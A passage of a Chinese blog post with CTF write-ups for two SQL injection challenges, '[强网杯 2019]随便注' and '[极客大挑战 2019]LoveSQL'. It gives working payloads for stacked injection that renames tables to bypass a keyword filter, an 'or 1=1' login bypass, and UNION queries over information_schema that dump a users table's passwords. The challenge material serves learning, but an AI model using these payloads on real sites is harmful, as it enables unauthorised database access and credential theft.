<h2 id="5-强网杯-2019-随便注"><a href="#5-强网杯-2019-随便注" class="headerlink" title="5.[强网杯 2019]随便注"></a>5.[强网杯 2019]随便注</h2><ul>
<li>测试引号，发现存在字符注入</li>
<li>查询字段数</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">/?inject=%27 order by 3 %23<br></code></pre></td></tr></table></figure>

<ul>
<li>然而联合查询时发现被过滤，回显如下</li>
</ul>
<figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs n1ql">return preg_match(&quot;/<span class="hljs-keyword">select</span>|<span class="hljs-keyword">update</span>|<span class="hljs-keyword">delete</span>|<span class="hljs-keyword">drop</span>|<span class="hljs-keyword">insert</span>|<span class="hljs-keyword">where</span>|\./i<span class="hljs-string">&quot;,$inject);</span><br></code></pre></td></tr></table></figure>

<ul>
<li>尝试堆叠注入</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs shell">//查库名<br>/?inject=%27;show databases; %23<br>//查表名<br>/?inject=%27;show tables; %23<br></code></pre></td></tr></table></figure>

<ul>
<li>查到｀1919810931114514｀表，查看其结构（<code>desc</code>）</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">/?inject=1&#x27;;desc `1919810931114514`;%23<br></code></pre></td></tr></table></figure>

<img src="C:\Users\23135\Pictures\Saved Pictures\image-20211016174745308.png" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="image-20211016174745308" style="zoom:67%;" />

<ul>
<li>再查看words表的结构（<code>desc words</code>）</li>
</ul>
<figure class="highlight sml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs sml"><span class="hljs-built_in">array</span>(<span class="hljs-number">6</span>) &#123;<br>  [<span class="hljs-number">0</span>]=&gt;<br>  <span class="hljs-built_in">string</span>(<span class="hljs-number">2</span>) <span class="hljs-string">&quot;id&quot;</span><br>  [<span class="hljs-number">1</span>]=&gt;<br>  <span class="hljs-built_in">string</span>(<span class="hljs-number">7</span>) <span class="hljs-string">&quot;int(10)&quot;</span><br>  [<span class="hljs-number">2</span>]=&gt;<br>  <span class="hljs-built_in">string</span>(<span class="hljs-number">2</span>) <span class="hljs-string">&quot;NO&quot;</span><br>  [<span class="hljs-number">3</span>]=&gt;<br>  <span class="hljs-built_in">string</span>(<span class="hljs-number">0</span>) <span class="hljs-string">&quot;&quot;</span><br>  [<span class="hljs-number">4</span>]=&gt;<br>  <span class="hljs-type">NULL</span><br>  [<span class="hljs-number">5</span>]=&gt;<br>  <span class="hljs-built_in">string</span>(<span class="hljs-number">0</span>) <span class="hljs-string">&quot;&quot;</span><br>&#125;<br><br><span class="hljs-built_in">array</span>(<span class="hljs-number">6</span>) &#123;<br>  [<span class="hljs-number">0</span>]=&gt;<br>  <span class="hljs-built_in">string</span>(<span class="hljs-number">4</span>) <span class="hljs-string">&quot;data&quot;</span><br>  [<span class="hljs-number">1</span>]=&gt;<br>  <span class="hljs-built_in">string</span>(<span class="hljs-number">11</span>) <span class="hljs-string">&quot;varchar(20)&quot;</span><br>  [<span class="hljs-number">2</span>]=&gt;<br>  <span class="hljs-built_in">string</span>(<span class="hljs-number">2</span>) <span class="hljs-string">&quot;NO&quot;</span><br>  [<span class="hljs-number">3</span>]=&gt;<br>  <span class="hljs-built_in">string</span>(<span class="hljs-number">0</span>) <span class="hljs-string">&quot;&quot;</span><br>  [<span class="hljs-number">4</span>]=&gt;<br>  <span class="hljs-type">NULL</span><br>  [<span class="hljs-number">5</span>]=&gt;<br>  <span class="hljs-built_in">string</span>(<span class="hljs-number">0</span>) <span class="hljs-string">&quot;&quot;</span><br>&#125;<br><br></code></pre></td></tr></table></figure>

<ul>
<li>据其他博主所说，猜测初始页面直接查询的表，正是words</li>
<li>语句为<code>selsect id,data from words where id =</code></li>
<li>flag应该是在数字串的表中，因此开始操作，堆叠注入，把words随便改成words1，然后把1919810931114514改成words，再把列名flag改成id，结合上面的1’ or 1=1#爆出表所有内容就可以查flag</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">payload:/?inject=0&#x27;;rename table words to words1;rename table `1919810931114514` to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc  words;#<br></code></pre></td></tr></table></figure>

<p>![image-20211016175813386](C:\Users\23135\Pictures\Saved Pictures\image-20211016175813386.png)</p>
<p>注意：在windows系统下，反单引号（`）是数据库、表、索引、列和别名用的引用符</p>
<hr>
<h2 id="6-极客大挑战-2019-LoveSQL"><a href="#6-极客大挑战-2019-LoveSQL" class="headerlink" title="6.[极客大挑战 2019]LoveSQL"></a>6.[极客大挑战 2019]LoveSQL</h2><ul>
<li><p>万能密码登录<code>1&#39; or 1=1 #</code>，密码随便输</p>
</li>
<li><p>结果可以正常登入，但无用</p>
</li>
<li><p>返回注入思路，payload：</p>
</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-operator">/</span><span class="hljs-operator">/</span>字段数查询<br>check.php?username<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-string">&#x27;order by 4 %23&amp;password=1 #报错</span><br><span class="hljs-string">check.php?username=1&#x27;</span><span class="hljs-keyword">order</span> <span class="hljs-keyword">by</span> <span class="hljs-number">3</span> <span class="hljs-operator">%</span><span class="hljs-number">23</span><span class="hljs-operator">&amp;</span>password<span class="hljs-operator">=</span><span class="hljs-number">1</span> #正常<br><span class="hljs-operator">/</span><span class="hljs-operator">/</span>爆库<br>check.php?username<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-string">&#x27;union select 1,2,database() %23&amp;password=1 #回显geek</span><br><span class="hljs-string">//爆表</span><br><span class="hljs-string">check.php?username=1&#x27;</span><span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,group_concat(table_name) <span class="hljs-keyword">FROM</span> information_schema.tables <span class="hljs-keyword">WHERE</span> table_schema<span class="hljs-operator">=</span>database() <span class="hljs-operator">%</span><span class="hljs-number">23</span><span class="hljs-operator">&amp;</span>password<span class="hljs-operator">=</span><span class="hljs-number">1</span><br>#回显<span class="hljs-string">&#x27;geekuser,l0ve1ysq1&#x27;</span>，尝试表l0ve1ysq1<br><span class="hljs-operator">/</span><span class="hljs-operator">/</span>爆列名<br>check.php?username<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-string">&#x27;union select 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name=&#x27;</span>l0ve1ysq1<span class="hljs-string">&#x27; %23&amp;password=1</span><br><span class="hljs-string">#回显&#x27;</span>id,username,password<span class="hljs-string">&#x27;</span><br><span class="hljs-string">//查看数据</span><br><span class="hljs-string">check.php?username=1&#x27;</span><span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,group_concat(id,username,password) <span class="hljs-keyword">from</span> l0ve1ysq1 <span class="hljs-operator">%</span><span class="hljs-number">23</span><span class="hljs-operator">&amp;</span>password<span class="hljs-operator">=</span><span class="hljs-number">1</span><br></code></pre></td></tr></table></figure>

<ul>
<li>得到flag</li>
</ul>
<hr>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/Cyber-Security/">Cyber-Security</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/writeup/">writeup</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/04/08/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Cwriteup-%E6%96%B0%E6%89%8B%E5%8C%BA/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">攻防世界writeup(新手区)</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/11/25/%E7%AE%80%E6%98%93%E9%82%AE%E7%AE%B1%E7%99%BB%E5%BD%95%E7%95%8C%E9%9D%A2(HTML%E3%80%81CSS%E3%80%81JS)/">
                        <span class="hidden-mobile">简易邮箱登录界面(HTML、CSS、JS)</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="twikoo"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#comments', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/twikoo@1/dist/twikoo.all.min.js', function() {
        var options = Object.assign(
          {"envId":"blog-3gentarg3e6a1b5e","region":"ap-shanghai","path":"window.location.pathname"},
          {
            el: '#twikoo',
            path: 'window.location.pathname',
            onCommentLoaded: function() {
              Fluid.plugins.initFancyBox('#twikoo .tk-content img:not(.tk-owo-emotion)');
            }
          }
        )
        twikoo.init(options)
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <div class="copyright">&copy;2020 - 2021 By Kerosene.W</div> <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- LeanCloud 统计PV -->
        <span id="leancloud-site-pv-container" style="display: none">
            总访问量 
            <span id="leancloud-site-pv"></span>
             次
          </span>
      
      
        <!-- LeanCloud 统计UV -->
        <span id="leancloud-site-uv-container" style="display: none">
            总访客数 
            <span id="leancloud-site-uv"></span>
             人
          </span>
      

    
  </div>


  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  




  <script defer src="/js/leancloud.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
        typing(title);
      
    })(window, document);
  </script>












  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
